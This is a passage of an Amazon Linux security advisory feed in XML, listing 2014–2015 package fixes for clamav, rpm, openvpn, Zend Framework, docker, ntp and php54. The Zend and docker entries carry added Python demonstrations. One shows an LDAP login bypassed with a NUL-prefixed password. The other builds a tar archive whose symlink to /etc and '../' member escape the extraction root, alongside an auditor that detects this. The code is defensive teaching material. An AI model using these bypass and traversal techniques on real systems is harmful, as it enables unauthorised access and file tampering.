</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3248" title="" id="CVE-2014-3248" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="facter" version="1.6.18" release="7.25.amzn1" epoch="0" arch="noarch"><filename>Packages/facter-1.6.18-7.25.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-457</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-457: low priority package update for clamav</title><issued date="2014-12-08 13:12:00" /><updated date="2014-12-08 13:16:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6497:
clamscan in ClamAV before 0.98.5, when using -a option, allows remote attackers to cause a denial of service (crash) as demonstrated by the jwplayer.js file.
1138101:
CVE-2013-6497 ClamAV: -a segmentation fault when processing files
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6497" title="" id="CVE-2013-6497" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="clamd" version="0.98.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamd-0.98.5-1.10.amzn1.x86_64.rpm</filename></package><package name="clamav-data-empty" version="0.98.5" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-empty-0.98.5-1.10.amzn1.noarch.rpm</filename></package><package name="clamav-scanner-sysvinit" version="0.98.5" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-scanner-sysvinit-0.98.5-1.10.amzn1.noarch.rpm</filename></package><package name="clamav-server" version="0.98.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-server-0.98.5-1.10.amzn1.x86_64.rpm</filename></package><package name="clamav" version="0.98.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-0.98.5-1.10.amzn1.x86_64.rpm</filename></package><package name="clamav-update" version="0.98.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-update-0.98.5-1.10.amzn1.x86_64.rpm</filename></package><package name="clamav-data" version="0.98.5" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-0.98.5-1.10.amzn1.noarch.rpm</filename></package><package name="clamav-scanner" version="0.98.5" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-scanner-0.98.5-1.10.amzn1.noarch.rpm</filename></package><package name="clamav-lib" version="0.98.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-lib-0.98.5-1.10.amzn1.x86_64.rpm</filename></package><package name="clamav-devel" version="0.98.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-devel-0.98.5-1.10.amzn1.x86_64.rpm</filename></package><package name="clamav-debuginfo" 
version="0.98.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-debuginfo-0.98.5-1.10.amzn1.x86_64.rpm</filename></package><package name="clamav-db" version="0.98.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-db-0.98.5-1.10.amzn1.x86_64.rpm</filename></package><package name="clamav-filesystem" version="0.98.5" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-filesystem-0.98.5-1.10.amzn1.noarch.rpm</filename></package><package name="clamav-server-sysvinit" version="0.98.5" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-server-sysvinit-0.98.5-1.10.amzn1.noarch.rpm</filename></package><package name="clamav-milter-sysvinit" version="0.98.5" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-milter-sysvinit-0.98.5-1.10.amzn1.noarch.rpm</filename></package><package name="clamav-milter" version="0.98.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-milter-0.98.5-1.10.amzn1.x86_64.rpm</filename></package><package name="clamav-server" version="0.98.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-server-0.98.5-1.10.amzn1.i686.rpm</filename></package><package name="clamav-milter" version="0.98.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-milter-0.98.5-1.10.amzn1.i686.rpm</filename></package><package name="clamd" version="0.98.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/clamd-0.98.5-1.10.amzn1.i686.rpm</filename></package><package name="clamav-update" version="0.98.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-update-0.98.5-1.10.amzn1.i686.rpm</filename></package><package name="clamav" version="0.98.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-0.98.5-1.10.amzn1.i686.rpm</filename></package><package name="clamav-db" version="0.98.5" release="1.10.amzn1" epoch="0" 
arch="i686"><filename>Packages/clamav-db-0.98.5-1.10.amzn1.i686.rpm</filename></package><package name="clamav-debuginfo" version="0.98.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-debuginfo-0.98.5-1.10.amzn1.i686.rpm</filename></package><package name="clamav-lib" version="0.98.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-lib-0.98.5-1.10.amzn1.i686.rpm</filename></package><package name="clamav-devel" version="0.98.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-devel-0.98.5-1.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-458</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-458: important priority package update for rpm</title><issued date="2014-12-09 07:34:00" /><updated date="2014-12-10 13:48:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8118:
It was found that RPM could encounter an integer overflow, leading to a stack-based overflow, while parsing a crafted CPIO header in the payload section of an RPM file. This could allow an attacker to modify signed RPM files in such a way that they would execute code chosen by the attacker during package installation.
1168715:
CVE-2014-8118 rpm: integer overflow and stack overflow in CPIO header parsing
CVE-2013-6435:
It was found that RPM wrote file contents to the target installation directory under a temporary name, and verified its cryptographic signature only after the temporary file had been written completely. Under certain conditions, the system interprets the unverified temporary file contents and extracts commands from it. This could allow an attacker to modify signed RPM files in such a way that they would execute code chosen by the attacker during package installation.
1039811:
CVE-2013-6435 rpm: race condition during the installation process
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6435" title="" id="CVE-2013-6435" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8118" title="" id="CVE-2014-8118" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rpm-devel" version="4.11.2" release="2.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-devel-4.11.2-2.58.amzn1.x86_64.rpm</filename></package><package name="rpm-sign" version="4.11.2" release="2.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-sign-4.11.2-2.58.amzn1.x86_64.rpm</filename></package><package name="rpm-build-libs" version="4.11.2" release="2.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-build-libs-4.11.2-2.58.amzn1.x86_64.rpm</filename></package><package name="rpm-python" version="4.11.2" release="2.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-python-4.11.2-2.58.amzn1.x86_64.rpm</filename></package><package name="rpm-cron" version="4.11.2" release="2.58.amzn1" epoch="0" arch="noarch"><filename>Packages/rpm-cron-4.11.2-2.58.amzn1.noarch.rpm</filename></package><package name="rpm" version="4.11.2" release="2.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-4.11.2-2.58.amzn1.x86_64.rpm</filename></package><package name="rpm-libs" version="4.11.2" release="2.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-libs-4.11.2-2.58.amzn1.x86_64.rpm</filename></package><package name="rpm-apidocs" version="4.11.2" release="2.58.amzn1" epoch="0" arch="noarch"><filename>Packages/rpm-apidocs-4.11.2-2.58.amzn1.noarch.rpm</filename></package><package name="rpm-debuginfo" version="4.11.2" release="2.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-debuginfo-4.11.2-2.58.amzn1.x86_64.rpm</filename></package><package name="rpm-build" version="4.11.2" release="2.58.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/rpm-build-4.11.2-2.58.amzn1.x86_64.rpm</filename></package><package name="rpm" version="4.11.2" release="2.58.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-4.11.2-2.58.amzn1.i686.rpm</filename></package><package name="rpm-sign" version="4.11.2" release="2.58.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-sign-4.11.2-2.58.amzn1.i686.rpm</filename></package><package name="rpm-build-libs" version="4.11.2" release="2.58.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-build-libs-4.11.2-2.58.amzn1.i686.rpm</filename></package><package name="rpm-devel" version="4.11.2" release="2.58.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-devel-4.11.2-2.58.amzn1.i686.rpm</filename></package><package name="rpm-python" version="4.11.2" release="2.58.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-python-4.11.2-2.58.amzn1.i686.rpm</filename></package><package name="rpm-debuginfo" version="4.11.2" release="2.58.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-debuginfo-4.11.2-2.58.amzn1.i686.rpm</filename></package><package name="rpm-build" version="4.11.2" release="2.58.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-build-4.11.2-2.58.amzn1.i686.rpm</filename></package><package name="rpm-libs" version="4.11.2" release="2.58.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-libs-4.11.2-2.58.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-459</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-459: medium priority package update for openvpn</title><issued date="2014-12-10 13:25:00" /><updated date="2014-12-10 13:27:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8104:
OpenVPN 2.x before 2.0.11, 2.1.x, 2.2.x before 2.2.3, and 2.3.x before 2.3.6 allows remote authenticated users to cause a denial of service (server crash) via a small control channel packet.
1166910:
CVE-2014-8104 openvpn: authenticated user can DoS OpenVPN by sending a too-short control channel packet to server
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8104" title="" id="CVE-2014-8104" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openvpn-debuginfo" version="2.3.6" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-debuginfo-2.3.6-1.12.amzn1.x86_64.rpm</filename></package><package name="openvpn" version="2.3.6" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-2.3.6-1.12.amzn1.x86_64.rpm</filename></package><package name="openvpn-debuginfo" version="2.3.6" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-debuginfo-2.3.6-1.12.amzn1.i686.rpm</filename></package><package name="openvpn" version="2.3.6" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-2.3.6-1.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-460</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-460: medium priority package update for php-ZendFramework</title><issued date="2014-12-11 14:23:00" /><updated date="2014-12-11 14:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8089:
1151277:
CVE-2014-8089 php-ZendFramework: SQL injection issue when using the sqlsrv PHP extension (ZF2014-06)
CVE-2014-8088:
The (1) Zend_Ldap class in Zend before 1.12.9 and (2) Zend\Ldap component in Zend 2.x before 2.2.8 and 2.3.x before 2.3.3 allows remote attackers to bypass authentication via a password starting with a null byte, which triggers an unauthenticated bind.
1151276:
CVE-2014-8088 php-ZendFramework: null byte issue, connect to LDAP without knowing the password (ZF2014-05)
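Why a leading NUL byte defeats the password check, as an added example that is not Zend Framework code: when the bind path hands the password to a NUL-terminated C string (as a libldap wrapper does), everything from the first 0x00 byte on is dropped and the server sees an empty password; RFC 4513 section 5.1 treats a DN with an empty password as an unauthenticated bind, which returns success on servers that do not refuse it. FakeLdapServer, the DN and the passwords below are constructed stand-ins, and the hardened check (reject empty or NUL-containing passwords before binding) is this example's own, not the project's patch.

```python
"""Added example, not Zend Framework's code: the mechanism behind CVE-2014-8088 and a pre-bind
check that closes it. FakeLdapServer, the DN and the passwords are constructed stand-ins."""


def c_string_truncate(password: bytes) -> bytes:
    """Model a bind path that hands the password to a NUL-terminated C string (as a libldap
    wrapper does): everything from the first 0x00 byte onward is silently dropped."""
    nul = password.find(b"\x00")
    return password if nul == -1 else password[:nul]


class FakeLdapServer:
    """Simple Bind outcomes per RFC 4513 section 5.1: no DN and no password is an anonymous
    bind; a DN with an empty password is an 'unauthenticated' bind, which returns success
    unless the server is configured to refuse it (the RFC recommends unwillingToPerform)."""

    def __init__(self, directory: dict, reject_unauthenticated: bool = False):
        self.directory = directory                    # dn -> password bytes
        self.reject_unauthenticated = reject_unauthenticated

    def simple_bind(self, dn: str, password: bytes) -> str:
        if not dn and not password:
            return "success"          # anonymous bind
        if dn and not password:
            return "unwillingToPerform" if self.reject_unauthenticated else "success"
        if self.directory.get(dn) == password:
            return "success"
        return "invalidCredentials"


def vulnerable_login(server: FakeLdapServer, dn: str, password: bytes) -> bool:
    """Bug shape: the password is truncated at NUL on the way to the server, and any bind
    that returns success is taken as proof that the user knew the password."""
    return server.simple_bind(dn, c_string_truncate(password)) == "success"


def hardened_login(server: FakeLdapServer, dn: str, password: bytes) -> bool:
    """Refuse, before binding, anything the server could treat as anonymous or
    unauthenticated: empty DN, empty password, or a password containing NUL."""
    if not dn or not password or b"\x00" in password:
        return False
    return server.simple_bind(dn, c_string_truncate(password)) == "success"


# Constructed directory: one user with one password.
ALICE = "cn=alice,ou=people,dc=example,dc=com"
DIRECTORY = {ALICE: b"correct horse battery"}


def demonstrate() -> dict:
    """Run both login paths against a permissive and a strict server; returns the outcomes."""
    permissive = FakeLdapServer(DIRECTORY)
    strict = FakeLdapServer(DIRECTORY, reject_unauthenticated=True)
    forged = b"\x00not the password"
    return {
        "vulnerable, permissive server, NUL password": vulnerable_login(permissive, ALICE, forged),
        "vulnerable, strict server, NUL password": vulnerable_login(strict, ALICE, forged),
        "hardened, permissive server, NUL password": hardened_login(permissive, ALICE, forged),
        "hardened, permissive server, real password": hardened_login(permissive, ALICE, DIRECTORY[ALICE]),
    }


if __name__ == "__main__":
    for case, ok in demonstrate().items():
        print(("LOGIN OK  " if ok else "rejected  ") + case)
```

The strict-server case shows the server-side half of the defence: a directory that refuses unauthenticated binds stops the forged login even through the vulnerable client, but the client-side check is what protects against directories you do not control.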
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8088" title="" id="CVE-2014-8088" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8089" title="" id="CVE-2014-8089" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php-ZendFramework-full" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-full-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Serializer-Adapter-Igbinary" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Serializer-Adapter-Igbinary-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Pgsql" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Pgsql-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Mssql" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Mssql-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-extras" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-extras-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Memcached" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Memcached-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Search-Lucene" version="1.12.9" release="1.10.amzn1" epoch="0" 
arch="noarch"><filename>Packages/php-ZendFramework-Search-Lucene-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Libmemcached" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Libmemcached-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Auth-Adapter-Ldap" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Auth-Adapter-Ldap-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Mysql" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Mysql-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Apc" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Apc-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Feed" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Feed-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Mysqli" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Mysqli-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Soap" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Soap-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Services" version="1.12.9" release="1.10.amzn1" epoch="0" 
arch="noarch"><filename>Packages/php-ZendFramework-Services-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Ldap" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Ldap-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Dojo" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Dojo-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-demos" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-demos-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Captcha" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Captcha-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Pdf" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Pdf-1.12.9-1.10.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-461</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-461: critical priority package update for docker</title><issued date="2014-12-11 16:40:00" /><updated date="2014-12-11 16:50:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9358:
1172787:
CVE-2014-9358 docker: Path traversal and spoofing opportunities presented through image identifiers
CVE-2014-9357:
1172782:
CVE-2014-9357 docker: Escalation of privileges during decompression of LZMA archives
CVE-2014-9356:
1172761:
CVE-2014-9356 docker: Path traversal during processing of absolute symlinks
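The absolute-symlink case named in CVE-2014-9356, as an added example that is not Docker's code: when an archive first creates a symlink whose target is absolute and then writes a regular file beneath that link, a checker that only inspects member names sees a harmless relative path, while the write lands outside the extraction root. The audit below resolves every member against the links seen earlier in the same archive and also catches plain '..' traversal; the extraction root, member names and archive are constructed for the example, and nothing is written to disk.

```python
"""Added example, not Docker's code: audit a layer tarball for members that would land outside
the extraction root, including files written through an absolute symlink created earlier in the
same archive. ROOT and the sample archive are hypothetical; nothing is written to disk."""

import io
import posixpath
import tarfile

ROOT = "/var/lib/layer"   # hypothetical extraction root


def _inside(path: str) -> bool:
    """True if an absolute, normalized path is the root or lies beneath it."""
    return path == ROOT or path.startswith(ROOT + "/")


def _resolve(name: str, links: dict) -> str:
    """Map a tar member name to the absolute path it would touch on disk, following symlinks
    already seen in this archive (links: absolute link path -> raw link target). A leading
    '/' in the member name is dropped, as tar extractors do; '..' is kept and may climb out."""
    cur = ROOT
    for part in posixpath.normpath(name).split("/"):
        if part in ("", "."):
            continue
        cur = posixpath.normpath(posixpath.join(cur, part))
        target = links.get(cur)
        if target is None:
            continue
        if target.startswith("/"):
            cur = posixpath.normpath(target)              # absolute link: jumps anywhere
        else:
            cur = posixpath.normpath(posixpath.join(posixpath.dirname(cur), target))
    return cur


def audit_layer(tar_bytes: bytes) -> list:
    """Return (member name, reason) for every member that would escape ROOT."""
    findings = []
    links = {}
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:") as tar:
        for m in tar.getmembers():
            dest = _resolve(m.name, links)
            if not _inside(dest):
                findings.append((m.name, "writes outside root: " + dest))
                continue
            if m.issym():
                # Record the link, then check where it points; a later member beneath it
                # is resolved through this entry by _resolve.
                links[dest] = m.linkname
                if m.linkname.startswith("/"):
                    target = posixpath.normpath(m.linkname)
                else:
                    target = posixpath.normpath(posixpath.join(posixpath.dirname(dest), m.linkname))
                if not _inside(target):
                    findings.append((m.name, "symlink points outside root: " + target))
            elif m.islnk():
                target = _resolve(m.linkname, links)
                if not _inside(target):
                    findings.append((m.name, "hardlink to outside root: " + target))
    return findings


def build_sample() -> bytes:
    """Constructed archive: two benign members, then the absolute-symlink pattern, then plain '..'."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        def add_file(name, data):
            ti = tarfile.TarInfo(name)
            ti.size = len(data)
            tar.addfile(ti, io.BytesIO(data))

        def add_symlink(name, target):
            ti = tarfile.TarInfo(name)
            ti.type = tarfile.SYMTYPE
            ti.linkname = target
            tar.addfile(ti)

        add_file("app/hello.txt", b"hi\n")                       # benign
        add_symlink("app/cfg", "../app")                         # relative link that stays inside
        add_symlink("etc", "/etc")                               # absolute link out of the root
        add_file("etc/cron.d/job", b"* * * * * root id\n")       # name looks relative, lands in /etc
        add_file("../outside.txt", b"x\n")                       # classic '..' traversal
    return buf.getvalue()


if __name__ == "__main__":
    for name, why in audit_layer(build_sample()):
        print(name, "-", why)
```

The point of resolving through earlier links rather than checking names in isolation is the third and fourth members: "etc/cron.d/job" is a clean relative name, and only the link recorded one entry earlier reveals where it would be written.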
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9356" title="" id="CVE-2014-9356" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9357" title="" id="CVE-2014-9357" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9358" title="" id="CVE-2014-9358" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="docker-devel" version="1.3.3" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-devel-1.3.3-1.0.amzn1.x86_64.rpm</filename></package><package name="docker-pkg-devel" version="1.3.3" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-pkg-devel-1.3.3-1.0.amzn1.x86_64.rpm</filename></package><package name="docker" version="1.3.3" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-1.3.3-1.0.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-462</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-462: important priority package update for ntp</title><issued date="2014-12-19 14:00:00" /><updated date="2014-12-19 14:09:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9296:
A missing return statement in the receive() function could potentially allow a remote attacker to bypass NTP's authentication mechanism.
1176040:
CVE-2014-9296 ntp: receive() missing return on error
CVE-2014-9295:
Multiple buffer overflow flaws were discovered in ntpd's crypto_recv(), ctl_putdata(), and configure() functions. A remote attacker could use any of these flaws to send a specially crafted request packet that could crash ntpd or, potentially, execute arbitrary code with the privileges of the ntp user. Note: the crypto_recv() flaw requires non-default configurations to be active, while the ctl_putdata() flaw, by default, can only be exploited by local attackers, and the configure() flaw requires additional authentication to exploit.
1176037:
CVE-2014-9295 ntp: Multiple buffer overflows via specially-crafted packets
CVE-2014-9294:
It was found that ntp-keygen used a weak method for generating MD5 keys. This could possibly allow an attacker to guess generated MD5 keys that could then be used to spoof an NTP client or server. Note: it is recommended to regenerate any MD5 keys that had explicitly been generated with ntp-keygen; the default installation does not contain such keys.
1176035:
CVE-2014-9294 ntp: ntp-keygen uses weak random number generator and seed when generating MD5 keys
CVE-2014-9293:
It was found that ntpd automatically generated weak keys for its internal use if no ntpdc request authentication key was specified in the ntp.conf configuration file. A remote attacker able to match the configured IP restrictions could guess the generated key, and possibly use it to send ntpdc query or configuration requests.
1176032:
CVE-2014-9293 ntp: automatic generation of weak default key in config_auth()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9293" title="" id="CVE-2014-9293" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9294" title="" id="CVE-2014-9294" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9295" title="" id="CVE-2014-9295" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9296" title="" id="CVE-2014-9296" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ntp" version="4.2.6p5" release="2.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-4.2.6p5-2.22.amzn1.x86_64.rpm</filename></package><package name="ntp-doc" version="4.2.6p5" release="2.22.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-doc-4.2.6p5-2.22.amzn1.noarch.rpm</filename></package><package name="ntp-perl" version="4.2.6p5" release="2.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-perl-4.2.6p5-2.22.amzn1.x86_64.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="2.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntpdate-4.2.6p5-2.22.amzn1.x86_64.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="2.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-debuginfo-4.2.6p5-2.22.amzn1.x86_64.rpm</filename></package><package name="ntp-perl" version="4.2.6p5" release="2.22.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-perl-4.2.6p5-2.22.amzn1.i686.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="2.22.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-debuginfo-4.2.6p5-2.22.amzn1.i686.rpm</filename></package><package name="ntp" version="4.2.6p5" release="2.22.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-4.2.6p5-2.22.amzn1.i686.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="2.22.amzn1" epoch="0" 
arch="i686"><filename>Packages/ntpdate-4.2.6p5-2.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-463</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-463: medium priority package update for php54</title><issued date="2015-01-08 11:35:00" /><updated date="2015-01-08 11:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8142:
Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate keys within the serialized properties of an object, a different vulnerability than CVE-2004-1019.
1175718:
CVE-2014-8142 php: use after free vulnerability in unserialize()
